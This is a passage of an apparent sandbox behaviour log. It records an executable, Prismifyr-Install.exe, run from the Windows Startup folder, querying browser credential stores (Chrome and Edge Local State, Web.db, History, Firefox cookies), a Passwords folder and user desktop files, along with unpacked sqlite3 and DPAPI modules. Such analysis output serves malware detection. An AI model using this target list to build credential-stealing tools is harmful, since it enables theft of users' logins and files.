      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3.d.ts VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\lib\sqlite3.d.ts VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\common-sqlite.gypi VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\common-sqlite.gypi VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\extract.js VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\sqlite-autoconf-3440200.tar.gz VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\sqlite-autoconf-3440200.tar.gz VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\sqlite3.gyp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\deps\sqlite3.gyp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\async.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\async.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\backup.cc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\backup.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\backup.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\database.cc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\database.cc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\database.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\database.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\gcc-preinclude.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\gcc-preinclude.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\macros.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\node_sqlite3.cc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\node_sqlite3.cc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\statement.cc VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\statement.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\statement.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\threading.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\src\threading.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\binding.gyp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\binding.gyp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\LICENSE VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\LICENSE VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\package.json VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\package.json VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\README.md VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\dist VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\dist\index.d.ts VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\dist\index.d.ts VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\dist\index.js VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\src VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\src\dpapi_addon.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\src\dpapi_addon.h VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\src\dpapi_not_supported.cpp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\src\dpapi_not_supported.cpp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\src\dpapi_win.cpp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\src\dpapi_win.cpp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\src\main.cpp VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\test VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\test\dpapi.spec.ts VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\test\dpapi.spec.ts VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\prebuilds VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\prebuilds\win32-x64 VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\prebuilds\win32-x64\node.napi.node VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg\da2172ce055fa47d6a0ea1c90654f530abed33f69a74d52fab06c4c7653b48fd\@primno\dpapi\prebuilds\win32-x64\node.napi.node VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Passwords VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web.db VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Cookies VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\ProgramData\Steam\Launcher\g5syNVTZ\EN-701188\Cookies VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Videos VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Videos\Captures VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.png VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\IPKGELNTQY VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.jpg VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\NEBFQQYWPS.xlsx VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.jpg VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.mp3 VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.png VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\SFPUSAFIOL.docx VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ATSCRGPSUM.png VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.png VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.jpg VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.pdf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.mp3 VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Documents\NEBFQQYWPS.xlsx VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformation
